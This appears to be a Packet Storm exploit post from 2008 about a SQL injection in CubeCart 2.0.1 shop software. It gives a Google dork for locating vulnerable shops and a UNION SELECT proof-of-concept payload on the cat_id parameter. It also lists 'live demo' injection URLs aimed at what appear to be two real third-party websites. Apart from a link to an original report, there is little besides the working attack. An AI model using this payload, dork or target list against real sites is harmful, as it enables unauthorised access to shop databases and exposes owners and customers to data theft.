This is an old SQL injection vulnerability for CubeCart CMS that has further details on exploitation since the original report surfaced years back.
6f3b2fdd1012626276288320241b737ad97ef49e91a642fd3d01a809466dcab4
;############################################################################
# Greetings to --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - P4tr1ck #
# and all darkc0de members #
;############################################################################
#
# Author: swappie [aka] faithlove
# Email : swappieakafaithlove@gmail.com
#
# Do researching and share!
#
;###############################################################
#
# Title: CubeCart CMS (Sql Injection)
#
# Vendor: http://www.cubecart.com/
#
#
;############################################################################
# #
# Dork: inurl:"/shop/index.php?cat_id=" intitle:"powered by CubeCart" 2.0.1 #
# #
#############################################################################
Here is the original info about the vuln:
http://www.securiteam.com/unixfocus/6K00E0KBFE.html
And I thought it would be a great idea to develop the bug.
--POC: http://www.site.com/shop/index.php?cat_id=-1 and 1=2 union all select @@version,2,3,4,5,6,7,8--
Live Demo:
---------
http://www.pv31.com/shop/index.php?cat_id=-1%20and%201=2%20union%20all%20select%20@@version,2,3,4,5,6,7,8--
http://fatguysinc.com/shop/index.php?cat_id=-1%20and%201=2%20union%20all%20select%20@@version,2,3,4,5,6,7,8--
###########################################################
#
# Exploit Developed on : 12 Oct.2008
###########################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed